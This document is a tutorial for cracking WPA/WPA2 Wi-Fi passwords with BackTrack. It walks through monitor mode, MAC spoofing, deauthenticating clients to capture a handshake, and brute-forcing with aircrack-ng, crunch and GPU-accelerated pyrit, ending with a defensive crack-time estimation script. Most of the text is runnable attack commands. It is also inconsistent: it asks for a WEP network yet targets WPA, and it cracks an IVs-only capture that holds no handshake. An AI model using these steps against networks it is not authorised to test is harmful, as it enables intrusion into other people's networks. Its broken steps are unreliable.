WARNING: Don't hack any router you aren't authorized to test, otherwise you'll be put in jail.
A few things need to be in place first, such as creating a virtual machine running in your OS if you have Windows.
- At the BOOT menu, just type startx
- Now you're all set to go; just follow the steps below.
Rules to Follow
- A BackTrack Live CD:
the Linux Live CD that lets you do all sorts of security testing tasks. Download a copy of the CD and burn it, or load it up in VMware to get started.
- Here is a link to download it: http://www.backtrack-linux.org/downloads
- I highly recommend downloading the BackTrack 32-bit version because it runs smoothly in Win7 64-bit through VMware Workstation.
- A nearby WEP-enabled Wi-Fi network
- Patience with the command line. This is a ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.
Steps to Follow:
Step 1 :
airmon-ng
The result will be something like :
Interface   Chipset      Driver
wlan0       Intel 5100   iwlagn - [phy0]
Step 2 :
airmon-ng start wlan0
Step 3 (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step 4 :
airodump-ng mon0
Then, press "Ctrl+c" to break the program.
Step 5 :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0
*where -c is the channel
-w is the file to be written (airodump-ng appends a counter, giving wpacrack-01.ivs)
--bssid is the BSSID of the access point
This terminal keeps running.
Step 6 :
Open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step 7 :
Use the John the Ripper word list to crack the WPA/WPA2 password.
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional) :
If you do not want to use the John the Ripper word list, you can use Crunch.
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters, and -w - tells aircrack-ng to read candidates from the pipe.
(B) nVidia Display Card with CUDA
If you have an nVidia card with CUDA, you can use pyrit together with crunch to crack the password.
Step a :
airmon-ng
The result will be something like :
Interface   Chipset      Driver
wlan0       Intel 5100   iwlagn - [phy0]
Step b :
airmon-ng start wlan0
Step c (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step d :
airodump-ng mon0
Then, press "Ctrl+c" to break the program.
Step e :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
Step f :
Open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g :
If the following packages are not yet installed, install them first.
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy
Step h :
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
Step i :
Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list
Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).
tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install
tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install
Step j :
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
Step k (Optional) :
If you encounter an error when reading wpacrack-01.cap, do the following instead.
pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
Step l :
Then you will see something similar to the following :
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.
Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the cracking speed is about 17,000 passwords per second.
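As an added example, not part of this tutorial, the following Python script shows why the crunch 8 16 run above is hopeless at the quoted rate, and why a long random passphrase holds up: it derives the WPA PMK the way pyrit and aircrack-ng must for every candidate (PBKDF2-HMAC-SHA1 as specified in IEEE 802.11i, checked against the standard's "password"/"IEEE" test vector) and divides the crunch keyspace by the 17,504 PMK/s shown in the pyrit output. The 95-character size of mixalpha-numeric-all-space (printable ASCII) is my assumption.

```python
"""Estimate how well a WPA2 passphrase policy resists the dictionary attack above.
PMK derivation is standard PBKDF2-HMAC-SHA1 (IEEE 802.11i); the charset size of
95 for mixalpha-numeric-all-space is an assumption (printable ASCII)."""
import hashlib


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit output.
    The SSID is the salt, so a precomputed table only helps against that SSID,
    and the 4096 rounds are why even a GPU manages only ~17k candidates/s."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def keyspace(charset_size: int, min_len: int, max_len: int) -> int:
    """Number of candidates 'crunch <min_len> <max_len>' emits for a charset."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def years_to_exhaust(candidates: int, pmk_per_second: float) -> float:
    """Worst-case time to try every candidate at the given PMK rate."""
    return candidates / pmk_per_second / (365 * 24 * 3600)


PRINTABLE = 95          # assumption: mixalpha-numeric-all-space == printable ASCII
GTX460_RATE = 17504.0   # PMKs/s quoted in the tutorial's pyrit output

if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
    print("PMK:", wpa_pmk("password", "IEEE").hex())
    for max_len in (8, 10, 12, 16):
        space = keyspace(PRINTABLE, 8, max_len)
        print(f"crunch 8 {max_len}: {space:.3e} candidates, "
              f"{years_to_exhaust(space, GTX460_RATE):.3e} years at {GTX460_RATE:.0f} PMK/s")
    # Contrast: an 8-character lowercase-only passphrase falls within months
    print(f"lowercase, 8 chars: {years_to_exhaust(keyspace(26, 8, 8), GTX460_RATE):.2f} years")
```

The practical takeaway for a network owner is that the attack only succeeds when the passphrase is inside a wordlist or a short, simple keyspace; 95^8 alone is already thousands of years at this rate.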
To test whether your wireless card (either USB or PCI-e) can do injection :
airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit works on your system :
pyrit list_cores